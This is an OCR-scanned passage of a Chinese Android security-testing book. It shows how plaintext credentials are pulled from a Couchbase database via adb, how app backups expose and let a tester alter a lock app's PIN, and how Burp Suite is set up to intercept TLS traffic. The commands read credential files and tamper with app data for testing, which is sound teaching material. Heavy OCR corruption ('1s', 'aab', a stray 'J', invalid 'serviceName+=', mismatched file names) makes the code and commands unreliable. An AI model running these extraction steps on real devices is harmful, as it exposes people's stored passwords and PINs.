库 的 表单 文档 中 。 


下 面 是 构建 该 示例 应 用 的 代码 。 











String databaseName = "credentials"; 


Database db; 


Manager manager = new Manager (new AndroidContext (this), 
Manager .DEFAULT_OPTIONS) ; 


try { 
db = manager.getDatabase (databaseName) ; 


} 
catch (CouchbaseLiteException e) { 
return; 
J 
String username= editTextUName.getText().toString(); 
String password= editTextPasswd.getText () .toString(); 
String serviceName+= editTextService.getText().toString(); 
Map < String, Object > data = new HashMap<String, Object>(); 
data.put ("username", username); 


data.put ("password", password); 


data.put ("Service", serviceName) ; 


Document document = db.createDocument () ; 


try { 


document .put Properties (data); 
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catch (CouchbaseLiteException e) { 
return; 
} 
上 面 的 代码 使 用 HashMap 在 NoSQL 数 据 库 中 保存 键 值 对 数据 。 
使 用 下 面 的 命令 将 这 个 应 用 安装 到 安 卓 设备 。 
C:\>adb install nosqldemo.apk 


安装 完成 后 ， 在 其 中 插入 一 些 用 户 名 和 密码 数据 。 打 开 aab shell, 访问 data 目 录 ， 查 看 这 
些 认证 信息 的 存储 位 置 。 


cd data/data/ 


在 本 例 中 , 应 用 的 安装 目录 在 com.example.nosqldemo 中 。 我 们 使 用 cq 命令 进入 该 目录 , 分 析 
它 的 文件 系统 并 查找 有 用 的 文件 。 


cd com.example.nosqldemo 


运行 1s 命 令 ， 然 后 输出 下 面 的 信息 。 






































root@t03g:/data/data/com.example.nosqldemo # 1s 

cache 

files 

lib 

NoSQL 是 一 种 数据 库 技 术 ， 因 此 我 们 希望 能 查看 数据 库 目 录 。 但 是 ， 这 里 只 有 files 目 录 。 实 
际 上 ， 缺 少数 据 库 目 录 是 因为 Couchbase 使 用 包 es 目 录 存 储 数据 库 文件 。 


进入 files 目 录 ， 查 看 其 中 的 文件 。 
































root@t03g:/data/data/com.example.nosqldemo/files # 1s 
credentials 

credentials.cblite 

credentials.cblite-journal 
root@t03g:/data/data/com.example.nosqldemo/files # 


Couchbase 将 数据 存储 在 扩展 名 为 .cblite 的 文件 中 ， 所 以 ，credentials.cblite 是 由 示例 应 用 创 
建 的 fe} 


与 其 他 例子 一 样 , 将 credentials.cblite 文 件 拉 取 到 计算 机 上 , 并 分 析 其 不 安全 的 数据 存储 方式 。 


root@t03g:/data/data/com.example.nosqldemo/files # pwd 
/data/data/com.example.nosqldemo/files 
root@t03g:/data/data/com.example.nosqldemo/files # 

C:\>adb pull /data/data/com.example.nosqldemo/files/carddetails.cblite 
1027 KB/s (114688 bytes in 0.108s) 
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现在 ， 我 们 得 到 了 Couchbase 数 据 库 文件 ， 由 于 它 是 文本 文件 ， 而 且 是 以 JSON 格 式 存储 数据 
的 ， 因 此 可 以 使 用 strings 命 令 查看 它 的 内 容 。 由 于 Windows 系 统 没有 strings 命 令 ， 所 以 我 安 
装 了 Windows 版 的 Cygwin， 并 在 Cygwin 终 端 中 打开 它 。 











你 可 以 从 https://cygwin.com/install.html 中 下 载 和 安装 Cygwin。 


android@laptop ~ 

$ strings credentials.cblite | grep 'qwerty' 
4-3bb12aee5£548c5b£074e507e8a9ac9f{"username": "alice", "password": "qwerty" 
,"service":"linkedin"} 

android@laptop~ 


正如 你 所 看 到 的 ， 用 户 名 和 密码 以 明文 的 形式 存储 ， 任 何人 都 能 访问 这 些 信息 。 


如 果 不 想 安装 Cygwin， 你 也 可 以 使 用 Sysinternals 提 供 的 strings.exe， 或 选择 使 用 任意 一 种 十 
六 进 制 编辑 需 。 


Ut 
































5.8 备份 技术 


前 面 所 有 的 例子 都 是 基于 已 ROOT 的 设备 。 你 可 能 会 说 ，ROOT 过 的 设备 毕竟 不 多 ， 我 们 在 
未 ROOT 的 设备 上 能 做 的 很 有 限 。 


本 节 将 探讨 如 何 使 用 备份 功能 在 未 ROOT 的 设备 上 查看 应 用 的 内 部 存储 。 利 用 特定 应 用 或 设 
备 的 备份 文件 ， 可 以 检查 其 安全 问题 。 


我 们 使 用 前 文中 的 WhatsApp Lock 应 用 来 进行 演示 。 














C:\ >adb pull /data/data/com.whatsapplock/shared prefs/ com.whatsapplock 
preferences.xml 

failed to copy '/data/data/com.whatsapplock/shared_prefs/ com. 
whatsapplock_preferences.xml' to 'com.whatsapplock_preferences.xml1': 
Permission denied 





如 上 所 示 ， 我 们 得 到 了 一 个 Permission denied 错 误 ， 因 为 adb 不 是 以 root 用 户 运 行 的 。 
现在 ,按照 下 面 的 步骤 使 用 安 卓 系统 备份 技术 来 查找 安全 问题 。 

(1) 使 用 aab backup 命 令 备份 应 用 的 数据 ; 

(2) 使 用 Android Backup Extractor 将 .ab 格式 转换 为 ,tar 格式; 














(3) 使 用 pax 或 star 工 具 解压 TAR 文件 ; 
(4) 分 析 上 一 步 解压 后 的 内 容 ， 查 找 存在 的 安全 问题 。 
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tar 和 7-Zip 等 标准 的 解压 工具 不 能 解压 abe.jar 生 成 的 文件 , 因为 它们 要 求 保存 
XY 目录 时 结尾 要 有 斜 线 。 
5.8.1 使 用 adb backup 命令 备份 应 用 数据 

安 卓 系统 可 以 使 用 自 带 的 adqb packup 命 令 来 备份 手机 中 所 有 的 数据 或 特定 应 用 的 数据 。 


下 图 展示 了 adqb backup 命 令 提供 的 选项 。 

















adb backup [-f <file>] [-apk]-noa 


adb restore <file> = re: nts from the <file> backup arch 





我 们 可 以 看 到 ， 该 命令 为 不 同 的 备份 需求 提供 了 诸多 选项 。 
我 们 可 以 使 用 下 面 的 命令 备份 整 部 安 卓 手机 。 
adb backup -all -shared -apk 


也 可 以 使 用 下 面 的 命令 备份 某 一 个 应 用 。 
adb backup -f < 文件 名 >< 包 名 > 


本 例 使 用 下 面 的 命令 。 























adb backup -f backup.abcom.whatsapplock 
运行 命令 将 输出 如 下 信息 。 

C:\>adb backup -f backup.abcom.whatsapplock 
现在 ， 解 锁 设 备 ， 并 确认 备份 操作 。 


正如 我 们 所 看 到 的 ， 上 面 的 命令 提示 我 们 解锁 屏幕 ， 并 点 击 Back up my data 按 钮 。 它 还 为 我 
们 提供 了 加 密 备份 文件 选项 ， 只 需 输 入 密码 即 可 。 
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Bi Full backup 


Do not back up Back up my data 





点 击 备份 按钮 后 ， 它 会 在 工作 目录 下 创建 一 个 名 为 backup.ab 的 文件 。 








C:\backup>dir 
Volume in drive C is System 
Volume Serial Number is 9E95-4121 


Directory of C:\backup 


25-Jan-16 11:59 AM <DIR> 

25-Jan-16 11:59 AM <DIR> a 
25-Jan-16 11:59 AM 4,447 backup.ab 
C:\backup> 


5.8.2 ”使 用 Android Backup Extractor 将 .ab 格式 转换 为 .tar 格式 


即使 得 到 了 backup.ab 文 件 , 我 们 还 是 不 能 直接 读 取 文件 内 容 。 首先, 需要 将 它 转 换 成 我 们 能 
理解 的 格式 。 这 就 要 用 到 Android Backup Extractor， 它 能 将 .ab 文 件 转 换 为 .tar 文 件 。 





























从 下 面 的 链接 下 载 Android Backup Extractor: http://sourceforge.net/projects/adbextractor/。 


将 ZIP 文 件 解压 后 ， 我 们 能 看 到 下 面 的 文件 和 文件 夹 。 

















| E E | E: 
Doc perl star-1.5.2-i6 star-1.5.3-i6 star-ubuntu abe.jar 
86-pc-cygw 86-pc-cygw -lucid 
in in 
i |S] =) 
adb-split-e adb-split-n LICENSE.TX README.TX tar-bin-split © VERSION.T 
xtraction.sh o-extractio Ai 15 jar XT 
nsh 
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昌 然 每 个 文件 和 文件 夹 都 有 自己 的 作用 ， 但 我 们 只 关心 abe,jar 这 个 文件 。 将 abe,jar 文 件 复 舍 
到 backup 目 录 下 ， 这 里 还 存放 了 backup.ab 文 件 。 





< 
一 


C:\backup>dir 
Volume in drive C is System 
Volume Serial Number is 9E95-4121 


Directory of C:\backup 


25-Jan-16 12:03 PM <DIR> 

25-Jan-16 12:03 PM <DIR> a 
03-Nov-15 01:10 AM 6,167,026 abe.jar 
25-Jan-16 11:59 AM 4,447 backup.ab 
C:\backup> 











使 用 下 面 的 命令 来 查看 这 个 工具 提供 的 选项 。 


C:\backup>java -jar abe.jar --help 
Android backup extractor v20151102 
Cipher.getMaxAllowedKeyLength("AES") = 128 
Strong AES encryption allowed, MaxKeyLenght is >= 256 
Usage: 
info: abe [-debug] [-useenv=yourenv] info <backup.ab> 
[password] 
unpack: abe [-debug] [-useenv=yourenv] unpack <backup.ab> 
<backup.tar> [password] 
pack: abe [-debug] [-useenv=yourenv] pack <backup.tar><backup. 
ab> [password] 
pack 4.4.3+: abe [-debug] [-useenv=yourenv] pack-kk<backup. 
tar> <backup.ab> [password] 
If -useenv is used, yourenv is tried when password is not given 
If -debug is used, information and passwords may be shown 
If the filename is '-', then data is read from standard input or 
written to standard output 


正如 我 们 所 看 到 的 , 可 以 使 用 abejar 来 打包 或 解 包 备份 文件 。 我 们 使 用 unpack 选 项 来 将 备份 
文件 解 包 。 从 帮助 信息 中 可 以 看 到 ， 我 们 需要 指定 目标 文件 为 ,tar 格式 。 




















C:\backup>java -jar abe.jar -debug unpack backup .ab backup.tar 
Strong AES encryption allowed 

Magic: ANDROID BACKUP 

Version: 1 

Compressed: 1 

Algorithm: none 

116224 bytes written to backup.tar 


如 上 所 示 ， 备 份 文件 被 转换 成 了 一 个 TAR 文件 ， 并 保存 在 工作 目录 中 。 


android@laptop /cygdrive/c/backup 
$ dir 
abe.jar backup.ab backup.tar 
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5.8.3 ”使 用 pax 或 star 工具 解压 TAR 文件 


现在 ， 我 们 需要 使 用 Android Backup Extractor 中 的 star 工 具 或 Cygwin 中 的 pax 工 具 将 TAR 文 从 
解压 。 


star.exe 的 语法 如 下 : 








C:\backup> star.exe -x backup.tar 


我 们 使 用 Cygwin 中 的 pax 工 具 来 解压 backup.tar。 











首先 从 Cygwin 资 源 库 中 安装 Cygwin、binutils 和 pax 模 块 。 安 装 完 成 后 ,打开 Cygwin 终 端 ， 你 


会 在 终端 界面 看 到 下 面 的 内 容 。 





android@laptop ~ 
$ pwd 
/home/android 


android@laptop ~ 
$ 


正如 我 们 所 看 到 的 ， 当 前 目录 并 不 是 cbackup 目 录 。 想 要 访问 C 盘 ， 需 要 先进 入 cygdrive ， 然 





后 使 用 下 面 的 命令 进入 C 盘 。 


android@laptop ~ 

$ cd /cygdrive/c/backup 

$ 1s 

abe.jar backup.ab backup.tar 


最 后 ， 使 用 pax 命 令 解压 TAR 文件 。 











$ pax -r < backup.tar 


以 上 命令 在 当前 目录 中 创建 了 apps 文 件 夹 ， 通 过 1s 命 令 就 能 查看 该 文件 夹 。 




















android@laptop /cygdrive/c/backup 
$ 1s 
abe.jar apps backup.ab backup.tar 


5.8.4 分析 解压 内 容 并 查找 安全 问题 
检查 一 下 apps 文 件 夹 里 面 的 内 容 ， 看 看 是 否 能 发 现 一 些 有 趣 的 东西 。 





android@laptop /cygdrive/c/backup 
$ cd apps 


android@laptop /cygdrive/c/backup/apps 
$ 1s 
com.whatsapplock 
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android@laptop /cygdrive/c/backup/apps 
$ cd com.whatsapplock/ 


android@laptop /cygdrive/c/backup/apps/com.whatsapplock 
$ 1s 
_manifest db f r sp 


正如 我 们 所 看 到 的 ， 里 面 有 一 个 名 为 com.whatsapplock 的 文件 夹 ， 它 包含 了 如 下 文件 夹 。 


O manifest: 应 用 的 AndroidManifest.xml 文 件 。 
O db: 包含 应 用 所 使 用 的 .db 文件 。 

Of: 保存 各 种 文件 。 

O sp: 保存 共享 首选 项 的 XML 文 件 。 

Or: 保存 视图 、 日 志 等 文件 。 


我 们 已 经 知道 ， 该 应 用 将 PIN 码 保存 在 共享 首选 项 目录 下 。 我 们 来 查看 一 下 这 种 不 安全 的 
shared_preferenc s 存 储 方式 。 


























android@laptop /cygdrive/c/backup/apps/com.whatsapplock 





$ cd sp/ 

android@laptop /cygdrive/c/backup/apps/com.whatsapplock/sp 5 
$ dir 

com.whatsapplock_preferences.xml inmobiAppAnalyticsAppId.xml 

IMAdTrackerStatusUpload.xml inmobiAppAnalyticsSession.xml 

impref.xml WhatsLock.xml 


android@laptop /cygdrive/c/backup/apps/com.whatsapplock/sp 
$ cat com.whatsapplock_preferences.xml 

<?xml version='1.0' encoding='utf-8' standalone='yes' ?> 
<map> 


<string name="entryCode">1234</string> 
<int name="revstatus" value="1" /> 
</map> 


android@laptop /cygdrive/c/backup/apps/com.whatsapplock/sp 
$ 


从 以 上 输出 可 知 ， 如 果 获 得 了 某 个 应 用 的 备份 文件 ， 我 们 就 能 在 没有 拥有 设备 root 权 限 的 情 
况 下 分 析 应 用 的 数据 。 当 需要 在 未 ROOT 的 设备 上 验证 某 个 概念 时 ， 这 就 会 很 用。 许多 安 卓 取 
证 工具 同样 使 用 了 备份 技术 ， 无 需 root 权 限 就 能 导出 数据 。 


我 们 同样 能 修改 导出 的 备份 文件 。 如 果 你 希望 修改 备份 文件 ,然后 将 其 还 原 至 设备 ,可 以 按 
照 下 面 的 步骤 进行 操作 。 


(1) 备份 目标 应 用 。 

















Tr 














adb backup -f backup .ab com.whatsapplock 
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(2) 使 用 aa 命令 删除 文件 头 ， 然 后 保存 修改 后 的 文件 。 保 存 文件 列表 ， 并 记录 文件 顺序 。 


dd if=backup.ab bs=24 skip=1| openssl zlib -d > backup.tar 
tar -tf backup.tar > backup.list 


(3) 解压 TAR 文 件 ， 然 后 根据 要 求 修改 应 用 内 容 ， 比 如 修改 PIN 码 和 应 用 设置 等 。 




















tar -xf backup.tar 


(4) 根据 修改 后 的 文件 重新 创建 .tar 文 件 。 





star -c -v -f newbackup.tar -no-dirslash list=backup.list 


(5) 将 原始 的 .ab 文件 的 文件 头 添加 到 新 文件 上 。 


wm 


dd if=mybackup.ab bs=24 count=1 of=newbackup.ab 


将 修改 后 的 内 容 添加 到 文件 头 。 





(6 


wm 


openssl zlib -in newbackup.tar >> newbackup.ab 
(7) 还 原 修改 过 的 备份 文件 。 
adb restore Dewbackup .ab 


与 数据 备份 一 样 ， 数 据 还 原 也 需要 用 户 确认 。 点 击 Restore my data 按 钮 完成 还 原 过 程 。 


iS: Full restore 


Do not restore Restore my data 














显然 , 对 设备 拥有 物理 访问 权限 的 攻击 者 可 以 对 其 做 任何 事情 。 在 接 下 来 的 几 章 中 , 我 们 还 
会 看 到 ， 锁 定 屏 幕 无 法 阻止 攻击 行为 。 














5.10 D% 125 





5.9 确保 数据 安全 
很 明显 ， 敏 感 信息 不 应 该 以 明文 存储 ， 想 要 安全 地 存储 数据 需要 花费 很 大 的 精力 。 


尽量 不 要 将 敏感 信息 存储 到 设备 上 ， 而 应 该 将 它 放 到 服务 器 上 。 如 果 必 须 选 择 前 者 ， 就 应 该 
在 存储 数据 的 时 候 使 用 加 密 算法 。 有 很 多 工具 库 可 以 帮助 你 对 保存 到 设备 上 的 数据 进行 加 密 。 

Secure Preferences 就 是 一 个 这 样 的 库 ， 它 能 帮 你 对 保存 到 共享 首选 项 的 数据 进行 加 密 。 可 以 
iH whttps://github.com/ scottyab/secure-preferences 找 到 它 。 


如 果 想 要 对 SQLite 数 据 库 进行 加 密 ， 可 以 选择 SQLCipher。 它 的 下 载 地 址 是 : https:/Avww. 
zetetic.net/sqlcipher/sqlcipher-forandroid/。 


注意 ， 当 使 用 类 似 AES 等 对 称 加 密 算法 时 ， 密 钥 管 理 是 一 个 问题 。 在 这 种 情况 下 ， 可 以 使 用 
基于 密码 加 密 ( PBE ) 的 方法 。 这 样 ， 密 钥 就 会 基于 用 户 输 入 的 密码 生成 。 


如 果 你 考虑 使 用 散 列 来 加 密 ， 那 就 选择 一 个 强 的 散 列 算法 并 对 其 加 盐 。 


5.10 小 结 EE 


本 童 讨论 了 安 卓 系统 使 用 的 多 种 数据 存储 机 制 ， 并 介绍 了 共享 首选 项 、SQLite 数 据 库 、 内 部 
存储 以 及 外 部 存储 等 几 种 不 安全 的 数据 存储 方式 。 借 助 备份 技术 ， 我 们 可 以 在 已 ROOT 的 设备 上 
进行 相同 的 处 理 ， 只 需 额 外 几 步 操作 ， 甚 至 在 未 ROOT 的 设备 上 也 可 以 。 下 一 章 将 讨论 在 服务 器 
上 查找 移动 应 用 漏洞 的 技术 。 
























































本 章 主要 介绍 安 卓 应 用 服务 器 端的 攻击 面 。 我 们 将 讨论 安 卓 应 用 后 端 、 设 备 以 及 应 用 架构 中 
其 他 组 件 可 能 遭受 的 攻击 。 我 们 将 针对 通过 网 络 进行 数据 库 通信 的 传统 应 用 构建 一 个 简单 的 威胁 
模型 。 了 解 应 用 可 能 面临 的 威胁 有 利于 进行 渗透 测试 。 本 章 是 一 篇 高 度 凝 练 的 概述 ， 只 包含 少量 
的 技术 细节 ， 因 为 大 部 分 服务 器 端的 漏洞 都 和 Web 攻 击 有 关 ，OWASP 测 试 与 开发 者 指南 涉及 了 
很 多 这 方面 的 内 容 。 


本 章 包含 以 下 主要 内 容 。 


口 移动 应 用 类 型 及 其 威胁 模型 
口 理解 移动 应 用 服务 器 端的 攻击 面 
口 移动 后 端 测试 方法 
m 设置 用 于 测试 的 burp 代 理 
4 通过 APN 
4 通过 Wi-Fi 
a 绕 过 证 书 警 告 
m 绕 过 HSTS 
m 绕 过 证 书 链 


口 OWASP 移 动 与 Web 十 大 漏洞 


针对 移动 后 端的 服务 器 端的 攻击 主要 是 Web 应 用 攻击 。SQL 注 入 、 命 令 注 入 、 存 储 式 跨 站 脚 
本 攻击 以 及 其 他 Web 攻 击 等 常见 的 攻击 , 通常 发 生 在 RESTful API 中 。 虽然 针对 安 卓 后 端的 攻击 可 
以 分 为 很 多 种 ,但 本 章 主要 介绍 针对 Web 层 和 传输 层 的 攻击 。 我 们 将 简要 讨论 多 种 和 移动 应 用 后 
端 安全 测试 与 保护 有 关 的 标准 和 指南 。 本章 没有 全 面 介 绍 Web 攻 击 , 如 果 读 者 想 要 深入 了 解 的 话 ， 
可 以 阅读 《黑客 攻防 技术 宝典 (Web 实战 篇 )》" 这 本 书 。 








































































































Q@ 此 书 已 由 人 民 邮 电 出 版 社 出 版 ， 详 见 http://www.ituring.com.cn/book/297。 一 一 编者 注 
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6.1 不 同类 型 的 移动 应 用 及 其 威胁 模型 
前 一 章 介绍 了 由 于 开发 方式 的 不 同 ， 安 卓 应 用 大 致 可 以 分 为 以 下 三 种 。 


口 Web 应 用 : 移动 Web 应 用 是 一 种 软件 ， 通 过 使 用 JavaScript、HTML5 等 技术 来 实现 交互 、 

导航 以 及 定制 功能 。 所 有 和 Web 相 关 的 攻击 都 适用 于 Web 应 用 。 

口 原生 应 用 : 原生 移动 应 用 具有 优良 的 性 能 和 高 度 的 可 靠 性 ， 能 够 访问 手机 上 的 各 种 应 用 ， 
比如 相机 、 通 讯 录 等 。 在 前 面 的 章节 中 ， 我 们 已 经 介绍 了 客户 端 攻击 ， 而 服务 央 端 攻击 
主要 是 针对 Web 服 务 的 攻击 ， 特 别 是 针对 RESTful API 的 攻击 。 

口 混合 应 用 : 与 原生 应 用 类 似 ， 混 合 应 用 在 设备 中 运行 ， 使 用 HTML5 、CSS 和 JavaScript 等 
Web 技 术 编 写 。Web 应 用 和 原生 应 用 中 可 能 出 现 的 漏洞 都 可 以 在 混合 应 用 中 找到 。 因 此 ， 
需要 综合 Web 应 用 和 原生 应 用 的 测试 方法 ， 对 混合 应 用 进行 全 面 的 渗透 测试 。 
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了 解 应 用 的 运行 原理 对 于 保障 应 用 安全 至 关 重 要 ,我 们 将 介绍 一 个 普通 的 安 卓 应 用 是 如 何 设 
计 和 使 用 的 ， 然 后 深入 分 析 应 用 所 具有 的 风险 。 






































移动 应 用 架构 


下 图 显示 了 一 种 移动 应 用 后 端的 典型 架构 ,其 中 包含 应 用 服务 器 和 数据 库 服务 器 。 这 个 应 用 6 
连接 了 基于 后 台数 据 库 服务 器 的 后 端 API 服 务 器 。 























训 用 服务 器 /REST API 




















(7 
授权 与 认 i 





Boer 


REST/SOAP APIs 











在 开发 软件 时 , 建议 遵循 安全 软件 开发 生命 周期 流程 。 很 多 企业 都 采用 安全 软件 开发 生命 周 
期 ， 来 保证 软件 开发 生命 周期 中 每 一 个 阶段 的 安全 性 。 
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在 应 用 设计 阶段 进行 威胁 建 模 , 可 以 有 效 控制 应 用 的 安全 漏洞 。 在 项 目 流程 前 期 构建 一 个 没 
有 漏洞 的 应 用 的 开发 成 本 比 在 生产 过 程 中 再 解决 这 些 漏洞 低 得 多 。 这 在 大 部 分 应 用 的 软件 开发 生 
命 周 期 过 程 中 都 被 忽视 了 。 


6.3 ”移动 后 端 测试 方法 


如 前 文 所 述 ， 后 端 测试 基本 上 就 是 Web 应 用 测试 。 我 们 需要 设置 我 们 最 喜欢 的 代理 软件 Burp 
Suite， 以 便于 查看 HTTP/HTTPS 流 量 。 





6.3.1 ”设置 用 于 测试 的 Burp Suite 代理 


为 了 测试 移动 应 用 服务 器 端的 漏洞 , 代理 是 测试 人 员 不 可 或 缺 的 工具 。 根据 使 用 的 网 络 类 型 
以 及 模拟 器 或 真 机 的 使 用 环境 ， 可 以 通过 多 种 方式 设置 代理 。 本 节 ， 我 们 将 通过 Wi-Fi 和 APN 来 
设置 Burp Suite。 


首先 设置 代理 监听 端口 号 ， 本 例 使 用 8082。 

(1) 选择 上 下 文选 项 卡 中 的 Proxy | Options. 

(2) 点 击 Add 按 钮 。 

(3) 输入 需要 绑 定 的 端口 并 选择 All interfaces， 如 下 图 所 示 。 


























































































































[ intercept | HTTP history | WebSockets history | Options | 
(2) Proxy Listeners 
Burp Proxy uses listeners to receive incomin g HTTP requests from your browser. You will need to configure your brows 
& 
Running | Interface | Invisible | Redirect | Certificate 
口 127.0.0.1:8080 e Per-host 
Edit 
Remove g 
Bil Add a new proxy listener (x J 
Binding | Request handling | Certificate 
图 These settings control how Burp binds the proxy listener. 
jeger) 
Bind to address: ©) Loopback only 
@ All interfaces 
© Specific address: [192.168.50.1 ” 
| ox Cancel 
4) 确保 Alerts 选 项 卡 显示 了 ice Started rt 8082 
erts My MAAN roxy Service started on po o 
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(5) 如 果 一 切 顺利 ， 会 出 现 类 似 下 图 的 界面 。 





2 Proxy Listeners 


F) Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as its proxy server. 

















Add Running | Interface | Invisible | Redirect | Certificate 
O [27008080 | O Per-host 
(Edit J 国 +2082 Oo Per-host 
~ 一 一 一 > 
Remove 









































现在 代理 已 经 启动 , 接 下 来 需要 配置 模拟 器 或 真 机 , 使 其 通过 代理 传递 所 有 网 络 请 求 和 响应 ， 
以 便 我 们 查看 后 台 都 发 生 了 什么 。 


1. 通过 APN 设 置 代 理 

按照 下 面 的 步骤 可 以 使 安 卓 设备 与 后 台 之 间 的 所 有 通信 和 都 经 过 代理 。 
(1) 点 击 Menu 按 钮 。 

(2) 点 击 Settings 按 钮 。 














(3) 选择 Wireless & Networks 中 的 More。 
(4) 选择 Cellular Networks。 


(5) 选择 Access Point Names (APNs)。 





T-Mobile US © 


epc.tmobile.com 





(6) 选择 Default Mobile 服务 供应 商 。 


Edit access point f 


Name 
T-Mobile US 


APN 
epe.tmobile.com 


Port 
lot se 
Username 
none 
Password 
Server 


MMSC 


http://mms.msg.eng.t-mobile.com/mms/wapenc 
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(7) 在 Edit access point ( 编辑 接 入 点 ) 界面 中 ， 分 别 填 入 代理 和 端口 。 本 例 使 用 192.168.1.17 

















和 8082。 


(8) 代理 设置 完成 后 ， 会 出 现 如 下 图 所 示 的 界面 。 

















Edit access point : 


Name 
T-Mobile US 


APN 
epc.tmobile.com 


Proxy 


192.168.117 “一 


Port 


3082 “一 


Username 
none 
Password 
sek 


Server 
* 


MMSC 





http://mms.msg.eng.t-mobile.com/mms/wapenc 








| 如 果 DNS 不 正确 ， 可 能 需要 手动 进行 设置 。 


2. 通过 Wi-Fi 设 置 代理 








| 


最 简单 的 设置 代理 的 方法 是 通过 Wi-Fi， 建 议 读 者 使 用 这 种 方法 ， 因 为 它 的 设置 和 测试 都 很 

















简单 。 在 设置 代理 之 前 ， 需 要 先 连接 Wi-Fi 并 进行 认证 。 
(1) 选择 已 连接 的 Wi-Fi 网 络 ( 本 例 使 用 WiredSSID )。 








今 查 你 是 否 能 连接 互联 网 。 








gv WiredSSID 


Connected 





(2) 长 按 直 至 弹出 上 下 文 菜单 。 
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WiredSSID 


Forget network 


Modify network 人 一 





(3) 选择 Modify network， 并 输入 代理 主机 和 端口 。 








WiredSSID 

Advanced options a 
Proxy 

Manual X 


The HTTP proxy is used by the browser but 
may not be used by the other apps. 


Proxy hostname 


192.168.1.17| 


Proxy port 
8082 








Bypass proxy for 


example.com,mycomp.test.com,localho 





IP settings 
DHCP v 


CANCEL SAVE 














(4) 保存 设置 ， 并 确认 代理 信息 。 


3. 绕 过 证 书 警告 和 HSTS 





通过 访问 wwwbaidu.com 来 检查 代理 设置 是 否 运行 正常 。 出 乎 意料 的 是 ， 弹 出 了 SSL 证 书 警告 。 








A 


There are problems with the security 
certificate for this site. 


Go back View certificate Continue 
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Ws 
X 





点 击 Continue 按 钮 ， 查 看 Burp Proxy 中 的 HTTP(S) 请 求 。 








Burp Intruder Repeater Window Help 





| Sequencer | Decoder | Comparer | Extender Project options | User options | Alerts | Logger 
Target Proxy | Spider | Scanner | Intruder | Repeater 

















| Intercept | HTTP history | WebSockets history | Options 








Ed! A; Request to https://www facebook.com:443 [69.171.230.68] 
| Forward | | Drop | | Intercept is on | Action omment this ite (E) (4 
| Raw | Params | Headers | Hex 


GET / HTTP/1.1 

Host: www.facebook.com 

Connection: close 

Accept: text/html, application/xhtml+xml, application/ xml; q=0.9, image/webp, */*;q=0.8 
iser-Agent: Mozilla/5.0 (Linux; Android 6.0; Google us SX - 6.0.0 - API 23 - 

1080x1920 Build/MRASSK) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 
{Chrome/40.0.0.0 Mobile Safari/537.36 

Accept-Encoding: gzip, deflate 

laccept-Language: en-US 

Cookie: datr=74YxV3CUSLcLTN3 y7DZdSivVXx; 

jreg_ fb ref=https*3As2F%2Fm. facebook. coms2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.co 
ms 252F; 

reg fb gate=httpss3As2F%2Fm. facebook. coms2F%3Frefsrcs3Dhttps%253A%252F%252Fwww.facebook.c 
joms252F; m_ts=146286416 wd=412x608 

-Requested-With: com.android.browser 



































行 认 证 ， 从 而 触发 了 一 个 证 书 警 告 。 


点 击 View _ Certificate 按钮， 我 们 会 看 到 发 证 机 构 是 PortSwigger CA， 但 正确 的 发 证 机 构 应 该 
是 Google Internet Authority G2。 


这 个 安全 警告 出 现 的 原因 是 ，Burp Suite 就 像 一 个 中 间 人 ， 浏 览 器 无 法 对 这 个 证 书 发 行者 进 








ea 


X This certificate isn't from a trusted authority 


Issued to: 


Serial number: 
1:64:D0 


Issued by: 


Organ 
PortS 


Organizational unit 
PortSwigger CA 


Validity: 


View page info 
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为 了 避免 每 次 都 弹出 这 个 窗口 , 需要 在 安 卓 设备 上 安装 Burp 的 证 书 。 通过 将 证 书 添加 到 设备 
的 受信 任 证 书 存储 区 ， 我 们 能 “欺骗 ”应 用 ， 使 其 误 认 为 Bump 的 证 书 是 可 信 的 。 


按照 下 面 的 步 又 安装 证 书 。 











(1) 打开 计算 机 中 的 浏览 器 ( 本 例 使 用 Firefox 浏 览 器 ), 按 下 面 的 路 径 设 置 代 理 : Tools | Options 
|Advanced | Network |Connection | Settings. 





€ | © Firefox about:preferences#advanced (= ® Q Search 


Advanced 


ca 


PA © 


General Data Choices Network Update Certificates 


Connection `~ 


Configure how Firefox connects to the Internet 2 Settings... 


Connection Settings 








Cornge Proxies to Access the Internet Clear Now 
© No proxy 


© Auto-detect proxy settings for this network 


© Use system proxy settings 


@ Manual proxy configuration: > 
HTTP Proxy: 127.0.0.1 Port: 8082 自 


[Z] Use this proxy server for all protocols 





























Clear Now 
(2) 在 上 下 文 菜单 中 ,输入 代理 的 主机 名 或 JP 地址 以 及 端口 号 。 
(3) 打开 http://burp/， 下 载 CA 证 书 ， 并 将 其 保存 到 计算 机 上 。 
Je Burp Suite Free Edition x + a 
€) © | http//burp C | @ [Q search rieu0utnrda®P= 


Burp Suite Free Edition 





Proxy History CA Certificate  Plug-n-hack 


Welcome to Burp Suite Free Edition. You can use this web interfaf} gfaccess the Proxy history, 
| download your Burp CA certificate, or configure your browser (via the Firefox plug-n-hack plugin). 


| 


Opening cacert.der 





You have chosen to open: 
a cacert.der 


which is: der File (712 bytes) 
from: http://burp 


What should Firefox do with this file? 


@ Save File 


Do this automatically for files like this from now on. 


aN 
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或 者 选择 Proxy | Options， 导 出 .der 格 式 的 证 书 ， 如 下 图 所 示 。 
Pro | Spder | Scanner | wer | Repeater 


| Intercept | HTTP history | WebSockets history | Options | 














(2) Proxy Listeners 


Ey Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your broy 
proxy server. 





Add | Running | Interface Invisible | Redirect Certificate 


2] 127.0.0.1:8080 图 Per-host 


( Eit j a Fo 口 Per-host 
b 
Remove | 























Each installation of Burp generates its own CA certificate that Proxy listeners can use when negotiating SSL conneq 
certificate for use in other, or another installation of Burp. 











| Import I export CA certificate | | Regenerate CA certificate "| 








(4) 点 击 Import/export CA certificate 后 ， 会 出 现 如 下 图 所 示 的 界面 。 


El CA Certificate [1 s 


(2) You can export your certificate and key for use in other tools, or in another 
installation of Burp. You can import a certificate and key to use in this 
installation of Burp. Note that you can also export the current certificate by 
visiting http://burp/cert in your browser. 











Export 

@ Certificate in DER format 

O Private key in DER format 

O Certificate and private key in PKCS#12 keystore 


Import 
O Certificate and private key in DER format 
© Certificate and private key from PKCS#12 keystore 


“Cancel | | Next 

















(5) 把 .der 后 绥 改 为 .cer， 然 后 将 证 书 文件 保存 到 安 卓 文件 系统 中 。 接 下 来 ， 使 用 下 面 的 命令 
安装 证 书 ， 这 些 命令 已 经 在 前 面 的 章节 中 介绍 过 。 


